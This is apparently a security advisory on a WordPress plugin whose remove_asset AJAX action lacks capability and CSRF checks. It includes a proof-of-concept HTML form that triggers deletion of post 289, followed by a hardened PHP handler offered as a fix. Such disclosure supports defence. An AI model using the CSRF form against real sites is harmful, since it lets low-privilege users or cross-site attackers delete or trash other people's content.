The plugin does not have authorisation and CSRF checks in the remove_asset AJAX action, and does not ensure that the item to be deleted is actually an asset. As a result, low-privilege users such as subscribers could delete arbitrary assets, as well as put arbitrary posts in the trash. v1.0.1 added a check to ensure that the post to be removed is an asset. However, the plugin is still missing capability and CSRF checks.
As a subscriber, or via CSRF against any authenticated user:
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="remove_asset" />
<input type="hidden" name="id" value="289" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
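
One way to close the remaining gaps in the remove_asset handler, shown as an added example that is not the plugin's own code. The function name, the nonce action and field, and the `asset` post type slug are assumptions, since the advisory does not give them.

```php
<?php
// Added example: hardened handler for the remove_asset AJAX action.
// Hypothetical names (not from the plugin): myplugin_remove_asset,
// the 'remove_asset_nonce' nonce action, the 'nonce' request field
// and the 'asset' post type slug.

// Register for logged-in users only; no wp_ajax_nopriv_ hook is added.
add_action( 'wp_ajax_remove_asset', 'myplugin_remove_asset' );

function myplugin_remove_asset() {
    // CSRF check: the request must carry a nonce issued to this user.
    // Passing false as the third argument makes check_ajax_referer()
    // return false instead of dying, so a JSON error can be sent.
    if ( ! check_ajax_referer( 'remove_asset_nonce', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
    }

    $post_id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    $post    = $post_id ? get_post( $post_id ) : null;

    // Type check (the part v1.0.1 added): only assets may be removed,
    // so arbitrary posts can no longer be sent to the trash.
    if ( ! $post || 'asset' !== $post->post_type ) {
        wp_send_json_error( array( 'message' => 'Not an asset' ), 404 );
    }

    // Capability check: 'delete_post' is a per-object meta capability,
    // so a subscriber cannot remove an asset they are not allowed to delete.
    if ( ! current_user_can( 'delete_post', $post_id ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    if ( ! wp_trash_post( $post_id ) ) {
        wp_send_json_error( array( 'message' => 'Could not remove asset' ), 500 );
    }

    // wp_send_json_* helpers terminate the request after sending output.
    wp_send_json_success( array( 'id' => $post_id ) );
}
```

The page that triggers the action has to output a matching nonce with `wp_create_nonce( 'remove_asset_nonce' )` and send it in the `nonce` field; a cross-site form like the one above cannot supply it.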